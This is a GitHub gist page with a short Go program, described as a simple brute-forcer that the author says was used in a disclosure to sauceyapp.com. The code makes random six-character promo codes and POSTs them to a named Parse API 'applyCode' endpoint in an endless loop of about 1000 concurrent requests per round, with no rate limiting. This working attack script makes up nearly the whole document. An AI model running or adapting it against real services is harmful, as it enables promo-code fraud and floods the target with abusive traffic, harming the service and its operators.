Created
February 27, 2016 01:24
-
-
Save dancompton/c1b8d5ed441efa64b8bf to your computer and use it in GitHub Desktop.
simple golang bruteforcer
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//used something like this in a disclosure to sauceyapp.com regarding bruteforcing | |
package main | |
import ( | |
"bytes" | |
"fmt" | |
"io/ioutil" | |
"math/rand" | |
"net/http" | |
"sync" | |
"time" | |
) | |
func req() { | |
const letterBytes = "abcdefghijklmnopqrstuvwxyz1234567890" | |
b := make([]byte, 6) | |
for i := range b { | |
b[i] = letterBytes[rand.Intn(len(letterBytes))] | |
} | |
url := "https://api.parse.com/1/functions/applyCode" | |
var jsonStr = []byte(`{"promoCode":"` + string(b[:6]) + `","_ApplicationId":"","_JavaScriptKey":"","_ClientVersion":"js1.3.4","_InstallationId":"","_SessionToken":""}`) | |
req, err := http.NewRequest("POST", url, bytes.NewBuffer(jsonStr)) | |
req.Header.Set("X-Custom-Header", "myvalue") | |
req.Header.Set("Content-Type", "application/json") | |
client := &http.Client{} | |
resp, err := client.Do(req) | |
if err != nil { | |
fmt.Println(err.Error()) | |
} | |
defer resp.Body.Close() | |
//fmt.Println("response Status:", resp.Status) | |
//fmt.Println("response Headers:", resp.Header) | |
body, _ := ioutil.ReadAll(resp.Body) | |
fmt.Println("response Headers:", string(body)) | |
} | |
func main() { | |
for { | |
wg := sync.WaitGroup{} | |
for i := 1; i < 1000; i++ { | |
go func() { | |
wg.Add(1) | |
defer wg.Done() | |
req() | |
}() | |
// TODO(whoever) | |
// https://godoc.org/?q=rate+limit | |
// maybe wait here for say second/1000, use time.Ticker, but prefer to use a token bucket implementation | |
} | |
wg.Wait() | |
time.Sleep(60 * time.Second) | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment